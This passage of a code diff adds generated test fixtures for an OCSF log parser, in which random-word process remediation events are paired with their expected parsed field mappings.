\"risk_level_id\": 1, \"uid_alt\": \"chevrolet header sensitive\"}, \"uid\": \"223d47d4-a02f-11ef-80dd-0242ac110007\", \"ext\": \"finnish quotations trigger\", \"type_id\": 1, \"parent_folder\": \"aging socks soc/traditions.nes\", \"hashes\": [{\"value\": \"CCF8B7F3C1B91940CEA0982813BDECBB4177E02F8485991FF6F5F1ED5AEB7448BB931BD088B4617001768303ECEE51E3D61A3CC7369BA9EEF3C965E865EFEA4A\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Clubs\", \"type\": \"Unknown\", \"uid\": \"223d59ae-a02f-11ef-8620-0242ac110007\", \"type_id\": 0, \"risk_score\": 1, \"uid_alt\": \"quebec robertson slovak\"}, \"tid\": 22, \"uid\": \"223d673c-a02f-11ef-9f3c-0242ac110007\", \"cmd_line\": \"barnes outlined alabama\", \"created_time\": 1731330977013, \"parent_process\": {\"name\": \"Weapons\", \"pid\": 16, \"file\": {\"name\": \"pale.odt\", \"owner\": {\"name\": \"Waiver\", \"type\": \"carroll\", \"type_id\": 99, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 13}, \"type\": \"Character Device\", \"path\": \"pupils demonstrated spam/constitution.obj/pale.odt\", \"ext\": \"intl hip entry\", \"type_id\": 3, \"company_name\": \"Lucas Emerald\", \"parent_folder\": \"pupils demonstrated spam/constitution.obj\", \"hashes\": [{\"value\": \"8DF60FF96BFECD59DE3F802675A05912\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"149D479F6A59E992D99E894B589A22B63E7F357049D6B573DA7AAD6DB5584F44\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"security_descriptor\": \"decade prepared deleted\", \"xattributes\": {}}, \"user\": {\"name\": \"Gbp\", \"domain\": \"cathedral faces lovers\", \"uid\": \"223dc06a-a02f-11ef-8a14-0242ac110007\", \"full_name\": \"Bryan Yasmine\", \"risk_score\": 94}, \"uid\": \"223dc7f4-a02f-11ef-850b-0242ac110007\", \"cmd_line\": \"religious membership rb\", \"created_time\": 1731330977015, \"parent_process\": {\"name\": \"Invite\", \"pid\": 19, \"file\": {\"name\": \"aggressive.icns\", \"type\": \"Block Device\", \"path\": \"nyc runtime slip/ballot.thm/aggressive.icns\", \"desc\": \"ease ill executed\", \"ext\": \"malpractice road end\", \"type_id\": 4, \"mime_type\": \"income/poison\", \"parent_folder\": \"nyc runtime slip/ballot.thm\", \"hashes\": [{\"value\": \"037AEAEAF4BBF26DDABE7256A8294DC52DA48D575A1247B5C2598C47DE7AEBAB\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"C63B81E57E6869E3358411F7CCE3A2FA7BBE6FE5C1C54E3B4FDCD214F77082948C4A05C49CF7AF90CB5D0F112840C2A2B7715C80A07CF8511D608E1546DB6AC1\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731330977016}, \"user\": {\"type\": \"User\", \"uid\": \"223decca-a02f-11ef-ab3c-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"cost_center\": \"motion saudi unix\", \"deleted_time\": 1731330977016, \"employee_uid\": \"223df7ba-a02f-11ef-8947-0242ac110007\", \"hire_time\": 1731330977016, \"last_login_time\": 1731330977016, \"ldap_dn\": \"table silent possibly\", \"surname\": \"alone tongue emotional\"}, \"risk_level\": \"Low\", \"risk_level_id\": 1}, \"uid\": \"223dff76-a02f-11ef-b8d3-0242ac110007\", \"loaded_modules\": [\"/penguin/celebration/epson/lenders/with.uue\", \"/prefer/motherboard/traveling/factors/lawyer.tmp\"], \"cmd_line\": \"except routing crowd\", \"created_time\": 1731330977017, \"sandbox\": \"mechanisms suppose founded\"}}, \"sandbox\": \"tide oral independent\"}}}, \"terminated_time\": 1731330977017}}, \"xattributes\": {}}, \"status\": \"Unknown\", \"time\": 1731330976994, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"appeals discrete crash\", \"version\": \"1.3.0\", \"uid\": \"223a5696-a02f-11ef-ac80-0242ac110007\", \"vendor_name\": \"license push emperor\"}, \"sequence\": 26, \"profiles\": [], \"log_name\": \"ideal extended offers\", \"log_provider\": \"seller deserve sharing\", \"original_time\": \"alfred invitations speaking\", \"tenant_uid\": \"223a5fec-a02f-11ef-af39-0242ac110007\"}, \"severity\": \"Critical\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700304, \"type_name\": \"Process Remediation Activity: Harden\", \"observables\": [{\"name\": \"uploaded bear will\", \"type\": \"Subnet\", \"type_id\": 12}, {\"name\": \"italic quantitative keno\", \"type\": \"Geo Location\", \"type_id\": 26}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 64, \"activity_name\": \"Harden\", \"command_uid\": \"223ab6e0-a02f-11ef-9ffc-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"223a6fdc-a02f-11ef-a601-0242ac110007\"}, \"d3f_technique\": {\"name\": \"columbus sync taken\", \"uid\": \"223a80c6-a02f-11ef-9766-0242ac110007\"}}], \"enrichments\": [{\"data\": \"trackback\", \"name\": \"natural segment seattle\", \"value\": \"rebecca stack obtain\", \"created_time\": 1731330976994, \"provider\": \"shall surplus transparency\", \"reputation\": {\"base_score\": 63.125, \"provider\": \"czech meter kinda\", \"score\": \"Possibly Malicious\", \"score_id\": 8}, \"src_url\": \"employees\"}, {\"data\": \"academics\", \"name\": \"todd earliest quick\", \"type\": \"older complicated mails\", \"value\": \"issued dressed latina\", \"created_time\": 1731330976994, \"provider\": \"tube subtle austin\", \"short_desc\": \"summer concentration specific\", \"src_url\": \"domestic\"}], \"severity_id\": 5, \"status_code\": \"malawi\", \"status_detail\": \"odd lib station\", \"status_id\": 0}" + }, + "expected": { + "message": "{\"message\": \"heaven country sugar\", \"process\": {\"name\": \"Success\", \"pid\": 94, \"file\": {\"name\": \"earliest.pdb\", \"owner\": {\"name\": \"Tee\", \"type\": \"Unknown\", \"domain\": \"term assembled gossip\", \"uid\": \"223ad95e-a02f-11ef-8523-0242ac110007\", \"type_id\": 0, \"full_name\": \"Kaycee Valarie\", \"risk_level\": \"orleans medicines legal\"}, \"type\": \"Regular File\", \"path\": \"guilty different comply/expects.accdb/earliest.pdb\", \"desc\": \"prominent purse jones\", \"ext\": \"rendered ministry investigators\", \"type_id\": 1, \"parent_folder\": \"guilty different comply/expects.accdb\", \"hashes\": [{\"value\": \"EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"6B1C747BA410921F62727C6AEE307A71A7021A4F23DCD2CCFAB1EC037E3A86C28518C84FC4E389893A41ED6CC8EFCA276E1FA37D836A1183305EC8DD7BC3D3F0\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"name\": \"Livestock\", \"type\": \"Admin\", \"uid\": \"223aed7c-a02f-11ef-943c-0242ac110007\", \"type_id\": 2, \"risk_level\": \"sense\", \"risk_level_id\": 99}, \"loaded_modules\": [\"/offered/her/msg/vegetarian/bizarre.html\", \"/principle/setting/liz/defendant/herself.wsf\"], \"cmd_line\": \"guided stretch phrases\", \"created_time\": 1731330976996, \"parent_process\": {\"name\": \"Em\", \"pid\": 60, \"file\": {\"name\": \"texas.rss\", \"type\": \"Regular File\", \"path\": \"pipeline memorabilia wednesday/lindsay.thm/texas.rss\", \"product\": {\"name\": \"rather rate cms\", \"version\": \"1.3.0\", \"uid\": \"223b1036-a02f-11ef-a666-0242ac110007\", \"lang\": \"en\", \"vendor_name\": \"assistance printers careful\"}, \"uid\": \"223b1766-a02f-11ef-b077-0242ac110007\", \"ext\": \"around clear funk\", \"type_id\": 1, \"parent_folder\": \"pipeline memorabilia wednesday/lindsay.thm\", \"accessed_time\": 1731330976998, \"hashes\": [{\"value\": \"0C9582BD64D9BAB6B4D907C275F45B5D3FC0035986E6294724E7FC4C77A9E16F42AD975BA9F5AD3884CCEFB2635640629F2AA538C5FDA52E2D872D3B73F65C6C\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"31FEBEB59C135F276A56FF06D2A3B00B982685E2D8EF3205B97EB80E0F4DCDC3\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"name\": \"Membership\", \"type\": \"System\", \"uid\": \"223b30c0-a02f-11ef-87cb-0242ac110007\", \"type_id\": 3, \"full_name\": \"Anita Rosanna\", \"email_addr\": \"Li@scientific.travel\"}, \"uid\": \"223b4aa6-a02f-11ef-9d39-0242ac110007\", \"cmd_line\": \"suits chris sega\", \"created_time\": 1731330976999, \"lineage\": [\"alternative consistently improved\", \"cats charm hardcover\"], \"parent_process\": {\"name\": \"Humor\", \"pid\": 26, \"file\": {\"name\": \"incorrect.gadget\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"upset india relax/marie.3gp/incorrect.gadget\", \"product\": {\"name\": \"grades internationally ordinary\", \"version\": \"1.3.0\", \"uid\": \"223b9d6c-a02f-11ef-af12-0242ac110007\", \"feature\": {\"name\": \"motivation bridges other\", \"version\": \"1.3.0\", \"uid\": \"223bade8-a02f-11ef-a579-0242ac110007\"}, \"vendor_name\": \"lightweight monday station\"}, \"uid\": \"223bb4f0-a02f-11ef-9470-0242ac110007\", \"ext\": \"celebrities intelligent david\", \"type_id\": 1, \"accessor\": {\"name\": \"Institutes\", \"type\": \"User\", \"uid\": \"223bc1b6-a02f-11ef-be06-0242ac110007\", \"org\": {\"uid\": \"223bcfee-a02f-11ef-9eaf-0242ac110007\", \"ou_name\": \"sixth rats hawk\"}, \"type_id\": 1, \"account\": {\"name\": \"fairy clause literally\", \"uid\": \"223be3a8-a02f-11ef-b63a-0242ac110007\"}, \"credential_uid\": \"223befc4-a02f-11ef-9ee4-0242ac110007\", \"ldap_person\": {\"email_addrs\": [\"Suzann@verbal.biz\", \"Flo@submissions.int\"], \"last_login_time\": 1731330977003, \"leave_time\": 1731330977003}, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 44}, \"parent_folder\": \"upset india relax/marie.3gp\", \"hashes\": [{\"value\": \"4B300F704B4BD8E100BDB3CAB1031A6CEDCB68FBC2C3606B1178586034AF4ECAC9A514E1A67728708F5FAD5AD1FC04AE78ECA412443352AF94457FEC9581ED11\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"C861DBBC3D16CC0E2D8C34764F0864239EBAC9973B25229B5ADFE56574C851ED73B6FCBC5931C8F0E23094B0D787E183BF5DF893560460CD403ED6F6C7174B7D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Protection\", \"type\": \"Unknown\", \"uid\": \"223c0d88-a02f-11ef-bfe0-0242ac110007\", \"type_id\": 0, \"full_name\": \"Brittanie Russel\", \"credential_uid\": \"223c156c-a02f-11ef-ae21-0242ac110007\", \"risk_level\": \"school wall wolf\", \"risk_score\": 37}, \"cmd_line\": \"roof dt critical\", \"created_time\": 1731330977004, \"parent_process\": {\"name\": \"Iv\", \"file\": {\"name\": \"retro.bmp\", \"type\": \"Named Pipe\", \"path\": \"rubber mj queen/archive.wav/retro.bmp\", \"signature\": {\"state\": \"lauderdale illustrated editorial\", \"certificate\": {\"version\": \"1.3.0\", \"subject\": \"mighty assisted detail\", \"issuer\": \"accompanied routers acne\", \"fingerprints\": [{\"value\": \"022DEC95C5096AFDD20A88DF019AC56B\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"8418E7362D4E0848D22B88FF2EC86F93AB49AE75A1558CE41B75732C6B78955A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731330977005, \"expiration_time\": 1731330977005, \"serial_number\": \"receivers stylish woods\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"rep jeff tape\", \"ext\": \"through testimonials cardiff\", \"type_id\": 6, \"parent_folder\": \"rubber mj queen/archive.wav\", \"accessed_time\": 1731330977005, \"hashes\": [{\"value\": \"311EF3B8DC9FFBC403CA8BFEFAF69F728D2BE1AFFB42206E860CAA9F9FC9D8A57266E69AF264348CFACF811255655CDAF7BF4204EA0E7C0AD91297FCCB92BD28\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}, {\"value\": \"12B400C07544526379365632C5EAE7B868347EA513F21C09D8F5A9306B373005\", \"algorithm\": \"magic\", \"algorithm_id\": 99}]}, \"user\": {\"name\": \"Rise\", \"type\": \"omissions\", \"uid\": \"223c3c36-a02f-11ef-a7a3-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"naturally textile pharmacies\", \"uid\": \"223c4b7c-a02f-11ef-90fb-0242ac110007\"}}, \"uid\": \"223c51e4-a02f-11ef-8de3-0242ac110007\", \"cmd_line\": \"keyboard milk printers\", \"created_time\": 1731330977006, \"parent_process\": {\"name\": \"Computation\", \"pid\": 30, \"file\": {\"name\": \"posted.yuv\", \"type\": \"Folder\", \"path\": \"kid hollow housing/trick.dwg/posted.yuv\", \"ext\": \"gage capabilities reasons\", \"type_id\": 2, \"accessor\": {\"type\": \"User\", \"uid\": \"223c6ed6-a02f-11ef-9e28-0242ac110007\", \"org\": {\"name\": \"salem civil rely\", \"uid\": \"223c784a-a02f-11ef-b6f3-0242ac110007\", \"ou_name\": \"saudi kathy going\"}, \"type_id\": 1, \"credential_uid\": \"223c7f2a-a02f-11ef-9b2e-0242ac110007\"}, \"parent_folder\": \"kid hollow housing/trick.dwg\", \"accessed_time\": 1731330977007, \"hashes\": [{\"value\": \"84282F14696FCE92F1387E783E6E35A7F462B8F63DD2CBBF03C8FBD817B4B334EA21DB328F7F7CC7040EBAEC27B5E741457DFC36FAEC09CB527ECE2B22C142C4\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"A74A78AF4E994F8C5ADE1098C677DEE43370A2B898524B0730EBFF42FA2C8359\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": false}, \"user\": {\"name\": \"Royal\", \"type\": \"eclipse\", \"uid\": \"223c92ee-a02f-11ef-b37d-0242ac110007\", \"org\": {\"name\": \"races obtaining business\", \"uid\": \"223c9f6e-a02f-11ef-80ed-0242ac110007\", \"ou_name\": \"larger phones hotel\", \"ou_uid\": \"223ca72a-a02f-11ef-b597-0242ac110007\"}, \"type_id\": 99, \"account\": {\"name\": \"execution implemented contributions\", \"type\": \"AWS Account\", \"uid\": \"223cb300-a02f-11ef-a109-0242ac110007\", \"type_id\": 10}, \"ldap_person\": {\"location\": {\"desc\": \"Senegal, Republic of\", \"city\": \"Barely vpn\", \"country\": \"SN\", \"coordinates\": [-6.1769, -23.2664], \"continent\": \"Africa\"}, \"given_name\": \"oven registrar consultant\", \"ldap_cn\": \"insulin convicted posted\", \"modified_time\": 1731330977010}}, \"tid\": 28, \"uid\": \"223d09cc-a02f-11ef-88a8-0242ac110007\", \"cmd_line\": \"cologne preventing pvc\", \"created_time\": 1731330977010, \"integrity\": \"tears\", \"integrity_id\": 99, \"parent_process\": {\"pid\": 58, \"file\": {\"name\": \"concept.tar\", \"type\": \"Regular File\", \"path\": \"aging socks soc/traditions.nes/concept.tar\", \"modifier\": {\"name\": \"Mai\", \"type\": \"mineral\", \"uid\": \"223d2b96-a02f-11ef-a466-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"fitting remembered advertiser\", \"type\": \"Linux Account\", \"uid\": \"223d378a-a02f-11ef-a93b-0242ac110007\", \"type_id\": 9}, \"credential_uid\": \"223d4086-a02f-11ef-aae8-0242ac110007\", \"risk_level\": \"Low\", \"risk_level_id\": 1, \"uid_alt\": \"chevrolet header sensitive\"}, \"uid\": \"223d47d4-a02f-11ef-80dd-0242ac110007\", \"ext\": \"finnish quotations trigger\", \"type_id\": 1, \"parent_folder\": \"aging socks soc/traditions.nes\", \"hashes\": [{\"value\": \"CCF8B7F3C1B91940CEA0982813BDECBB4177E02F8485991FF6F5F1ED5AEB7448BB931BD088B4617001768303ECEE51E3D61A3CC7369BA9EEF3C965E865EFEA4A\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Clubs\", \"type\": \"Unknown\", \"uid\": \"223d59ae-a02f-11ef-8620-0242ac110007\", \"type_id\": 0, \"risk_score\": 1, \"uid_alt\": \"quebec robertson slovak\"}, \"tid\": 22, \"uid\": \"223d673c-a02f-11ef-9f3c-0242ac110007\", \"cmd_line\": \"barnes outlined alabama\", \"created_time\": 1731330977013, \"parent_process\": {\"name\": \"Weapons\", \"pid\": 16, \"file\": {\"name\": \"pale.odt\", \"owner\": {\"name\": \"Waiver\", \"type\": \"carroll\", \"type_id\": 99, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 13}, \"type\": \"Character Device\", \"path\": \"pupils demonstrated spam/constitution.obj/pale.odt\", \"ext\": \"intl hip entry\", \"type_id\": 3, \"company_name\": \"Lucas Emerald\", \"parent_folder\": \"pupils demonstrated spam/constitution.obj\", \"hashes\": [{\"value\": \"8DF60FF96BFECD59DE3F802675A05912\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"149D479F6A59E992D99E894B589A22B63E7F357049D6B573DA7AAD6DB5584F44\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"security_descriptor\": \"decade prepared deleted\", \"xattributes\": {}}, \"user\": {\"name\": \"Gbp\", \"domain\": \"cathedral faces lovers\", \"uid\": \"223dc06a-a02f-11ef-8a14-0242ac110007\", \"full_name\": \"Bryan Yasmine\", \"risk_score\": 94}, \"uid\": \"223dc7f4-a02f-11ef-850b-0242ac110007\", \"cmd_line\": \"religious membership rb\", \"created_time\": 1731330977015, \"parent_process\": {\"name\": \"Invite\", \"pid\": 19, \"file\": {\"name\": \"aggressive.icns\", \"type\": \"Block Device\", \"path\": \"nyc runtime slip/ballot.thm/aggressive.icns\", \"desc\": \"ease ill executed\", \"ext\": \"malpractice road end\", \"type_id\": 4, \"mime_type\": \"income/poison\", \"parent_folder\": \"nyc runtime slip/ballot.thm\", \"hashes\": [{\"value\": \"037AEAEAF4BBF26DDABE7256A8294DC52DA48D575A1247B5C2598C47DE7AEBAB\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"C63B81E57E6869E3358411F7CCE3A2FA7BBE6FE5C1C54E3B4FDCD214F77082948C4A05C49CF7AF90CB5D0F112840C2A2B7715C80A07CF8511D608E1546DB6AC1\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731330977016}, \"user\": {\"type\": \"User\", \"uid\": \"223decca-a02f-11ef-ab3c-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"cost_center\": \"motion saudi unix\", \"deleted_time\": 1731330977016, \"employee_uid\": \"223df7ba-a02f-11ef-8947-0242ac110007\", \"hire_time\": 1731330977016, \"last_login_time\": 1731330977016, \"ldap_dn\": \"table silent possibly\", \"surname\": \"alone tongue emotional\"}, \"risk_level\": \"Low\", \"risk_level_id\": 1}, \"uid\": \"223dff76-a02f-11ef-b8d3-0242ac110007\", \"loaded_modules\": [\"/penguin/celebration/epson/lenders/with.uue\", \"/prefer/motherboard/traveling/factors/lawyer.tmp\"], \"cmd_line\": \"except routing crowd\", \"created_time\": 1731330977017, \"sandbox\": \"mechanisms suppose founded\"}}, \"sandbox\": \"tide oral independent\"}}}, \"terminated_time\": 1731330977017}}, \"xattributes\": {}}, \"status\": \"Unknown\", \"time\": 1731330976994, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"appeals discrete crash\", \"version\": \"1.3.0\", \"uid\": \"223a5696-a02f-11ef-ac80-0242ac110007\", \"vendor_name\": \"license push emperor\"}, \"sequence\": 26, \"profiles\": [], \"log_name\": \"ideal extended offers\", \"log_provider\": \"seller deserve sharing\", \"original_time\": \"alfred invitations speaking\", \"tenant_uid\": \"223a5fec-a02f-11ef-af39-0242ac110007\"}, \"severity\": \"Critical\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700304, \"type_name\": \"Process Remediation Activity: Harden\", \"observables\": [{\"name\": \"uploaded bear will\", \"type\": \"Subnet\", \"type_id\": 12}, {\"name\": \"italic quantitative keno\", \"type\": \"Geo Location\", \"type_id\": 26}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 64, \"activity_name\": \"Harden\", \"command_uid\": \"223ab6e0-a02f-11ef-9ffc-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"223a6fdc-a02f-11ef-a601-0242ac110007\"}, \"d3f_technique\": {\"name\": \"columbus sync taken\", \"uid\": \"223a80c6-a02f-11ef-9766-0242ac110007\"}}], \"enrichments\": [{\"data\": \"trackback\", \"name\": \"natural segment seattle\", \"value\": \"rebecca stack obtain\", \"created_time\": 1731330976994, \"provider\": \"shall surplus transparency\", \"reputation\": {\"base_score\": 63.125, \"provider\": \"czech meter kinda\", \"score\": \"Possibly Malicious\", \"score_id\": 8}, \"src_url\": \"employees\"}, {\"data\": \"academics\", \"name\": \"todd earliest quick\", \"type\": \"older complicated mails\", \"value\": \"issued dressed latina\", \"created_time\": 1731330976994, \"provider\": \"tube subtle austin\", \"short_desc\": \"summer concentration specific\", \"src_url\": \"domestic\"}], \"severity_id\": 5, \"status_code\": \"malawi\", \"status_detail\": \"odd lib station\", \"status_id\": 0}", + "event": { + "action": "harden", + "category": [], + "outcome": "unknown", + "provider": "seller deserve sharing", + "reason": "heaven country sugar", + "sequence": 26, + "severity": 5, + "type": [] + }, + "@timestamp": "2024-11-11T13:16:16.994000Z", + "file": { + "directory": "guilty different comply/expects.accdb", + "hash": { + "sha256": "EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698", + "tlsh": "6B1C747BA410921F62727C6AEE307A71A7021A4F23DCD2CCFAB1EC037E3A86C28518C84FC4E389893A41ED6CC8EFCA276E1FA37D836A1183305EC8DD7BC3D3F0" + }, + "name": "earliest.pdb", + "owner": "Tee", + "path": "guilty different comply/expects.accdb/earliest.pdb", + "type": "Regular File", + "uid": "223ad95e-a02f-11ef-8523-0242ac110007" + }, + "ocsf": { + "activity_id": 4, + "activity_name": "Harden", + "class_name": "Process Remediation Activity", + "class_uid": 7003, + "process": { + "parent": { + "user": { + "email": "Li@scientific.travel", + "full_name": "Anita Rosanna" + } + } + } + }, + "process": { + "command_line": "guided stretch phrases", + "name": "Success", + "parent": { + "command_line": "suits chris sega", + "entity_id": "223b4aa6-a02f-11ef-9d39-0242ac110007", + "name": "Em", + "pid": 60, + "start": "2024-11-11T13:16:16.999000Z", + "user": { + "id": [ + "223b30c0-a02f-11ef-87cb-0242ac110007" + ], + "name": "Membership" + } + }, + "pid": 94, + "start": "2024-11-11T13:16:16.996000Z", + "user": { + "id": [ + "223aed7c-a02f-11ef-943c-0242ac110007" + ], + "name": "Livestock" + } + }, + "related": { + "hash": [ + "EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698" + ], + "user": [ + "Tee" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_process_remediation_activity_2.json b/OCSF/ocsf/tests/generated_process_remediation_activity_2.json new file mode 100644 index 000000000..899ec4fb5 --- /dev/null +++ b/OCSF/ocsf/tests/generated_process_remediation_activity_2.json @@ -0,0 +1,69 @@ +{ + "input": { + "message": "{\"message\": \"sellers besides hl\", \"process\": {\"name\": \"Prince\", \"pid\": 7, \"file\": {\"name\": \"propose.pptx\", \"type\": \"Folder\", \"signature\": {\"algorithm\": \"DSA\", \"algorithm_id\": 1}, \"modifier\": {\"name\": \"Stylish\", \"type\": \"Unknown\", \"uid\": \"28d3fd18-a02f-11ef-af24-0242ac110007\", \"type_id\": 0, \"ldap_person\": {\"employee_uid\": \"28d42ee6-a02f-11ef-9279-0242ac110007\"}, \"risk_level\": \"loving\", \"risk_level_id\": 99, \"risk_score\": 0}, \"desc\": \"ceiling patches side\", \"uid\": \"28d43742-a02f-11ef-9ec1-0242ac110007\", \"type_id\": 2, \"creator\": {\"name\": \"Remained\", \"type\": \"latino\", \"domain\": \"rest investor soa\", \"uid\": \"28d473e2-a02f-11ef-9ccb-0242ac110007\", \"type_id\": 99}, \"hashes\": [{\"value\": \"89759E1284E2479B991D2669DE104942\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"C19F43EB415F38C482F5CB26B9720DA398AA56B47B415867BBA7F118EB0D89D563350BA26D579DC834B11828F7E929E3AD3F14B90D86D0610F44E088AD1F2B64\", \"algorithm\": \"CTPH\", \"algorithm_id\": 5}]}, \"user\": {\"name\": \"Pork\", \"type\": \"User\", \"uid\": \"28d4888c-a02f-11ef-82fc-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"location\": {\"desc\": \"Dominica, Commonwealth of\", \"city\": \"Discrimination fri\", \"country\": \"DM\", \"coordinates\": [92.1251, 34.7562], \"continent\": \"North America\"}, \"manager\": {\"name\": \"Idol\", \"type\": \"Admin\", \"uid\": \"28d4cb94-a02f-11ef-b90f-0242ac110007\", \"type_id\": 2, \"risk_level\": \"gothic smithsonian garmin\"}, \"employee_uid\": \"28d4d544-a02f-11ef-ad52-0242ac110007\", \"given_name\": \"includes livestock index\", \"job_title\": \"strategies compliant references\", \"leave_time\": 1731330988071, \"modified_time\": 1731330988071}, \"uid_alt\": \"control gary baking\"}, \"tid\": 47, \"uid\": \"28d4de90-a02f-11ef-98b9-0242ac110007\", \"cmd_line\": \"characters vocal tracy\", \"created_time\": 1731330988072, \"parent_process\": {\"pid\": 40, \"file\": {\"attributes\": 79, \"name\": \"irc.com\", \"type\": \"Unknown\", \"path\": \"finding possibilities clinton/cached.asf/irc.com\", \"signature\": {\"state\": \"Revoked\", \"certificate\": {\"version\": \"1.3.0\", \"is_self_signed\": false, \"subject\": \"external compiler heated\", \"issuer\": \"appears hungry drive\", \"fingerprints\": [{\"value\": \"63F62E392F7025A4167DD1EC5A9EF966C16729FDC201CB89B807A60D5332A7A9473433A7AE2CD8C213C47520CFCDF970F3EA2DFEF02D04EA5B66610BDEA8D497\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}], \"created_time\": 1731330988072, \"expiration_time\": 1731330988072, \"serial_number\": \"configuration deadline calgary\"}, \"algorithm\": \"fails\", \"algorithm_id\": 99, \"state_id\": 3}, \"modifier\": {\"type\": \"User\", \"uid\": \"28d51ef0-a02f-11ef-92f3-0242ac110007\", \"type_id\": 1, \"email_addr\": \"Yu@monroe.mil\"}, \"ext\": \"consequences years ecology\", \"type_id\": 0, \"parent_folder\": \"finding possibilities clinton/cached.asf\", \"hashes\": [{\"value\": \"A6426312E27AB008F4EDC3204E03FD5B383EA1C8B4A4567E748A42CEF025EF43A89764E99A4D39740137733A152598B7050663A2C427F7874F331D0609FD3CB8\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"EACCA81A25CF539B76C8A39BB632EC20C918EF9EFD1E73B8FDEB68C67765DE58E5925C523C695E88ACB94E43C38BA494EFF4D1A415A91C332930A3FB12A5AF27\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"type\": \"Unknown\", \"uid\": \"28d53156-a02f-11ef-aa73-0242ac110007\", \"type_id\": 0}, \"tid\": 51, \"uid\": \"28d53f16-a02f-11ef-9a1e-0242ac110007\", \"cmd_line\": \"commission relying steady\", \"created_time\": 1731330988074, \"integrity\": \"Medium\", \"integrity_id\": 3, \"parent_process\": {\"pid\": 56, \"session\": {\"terminal\": \"occur match lan\", \"uid\": \"28d58f84-a02f-11ef-8740-0242ac110007\", \"created_time\": 1731330988076, \"expiration_reason\": \"therapeutic midlands visited\", \"is_remote\": true}, \"file\": {\"attributes\": 47, \"name\": \"anymore.tar\", \"owner\": {\"name\": \"Halifax\", \"type\": \"User\", \"type_id\": 1, \"risk_level\": \"Medium\", \"risk_level_id\": 2}, \"type\": \"Regular File\", \"uid\": \"28d5c4cc-a02f-11ef-8469-0242ac110007\", \"type_id\": 1, \"hashes\": [{\"value\": \"F573102FF9F85CEA0795FA811907D06B74C86CDE18D2999A2070523EC27478C2F15F634D3D0509B660995C0695E665C4A124CD5F1F657FD9E26AC679200F1425\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}], \"modified_time\": 1731330988078, \"security_descriptor\": \"realtors shoulder kilometers\", \"xattributes\": {}}, \"user\": {\"name\": \"Figured\", \"type\": \"System\", \"uid\": \"28d5fac8-a02f-11ef-895f-0242ac110007\", \"type_id\": 3, \"credential_uid\": \"28d602ac-a02f-11ef-9c04-0242ac110007\", \"email_addr\": \"Darla@movies.org\"}, \"uid\": \"28d63402-a02f-11ef-b1e9-0242ac110007\", \"cmd_line\": \"overview statutes valves\", \"created_time\": 1731330988080, \"integrity\": \"losses renewal aquatic\"}}}, \"status\": \"dynamic acer dollar\", \"time\": 1731330988061, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"diamond aaa screensavers\", \"version\": \"1.3.0\", \"path\": \"mem anthropology notifications\", \"uid\": \"28d1a536-a02f-11ef-92c5-0242ac110007\", \"cpe_name\": \"quebec labs assume\", \"vendor_name\": \"professionals subsidiary maria\"}, \"labels\": [\"bandwidth\", \"jeremy\"], \"profiles\": [], \"event_code\": \"digit\", \"log_name\": \"bosnia blind seq\", \"log_provider\": \"arg handed dock\", \"log_version\": \"congratulations solution vancouver\", \"original_time\": \"famous 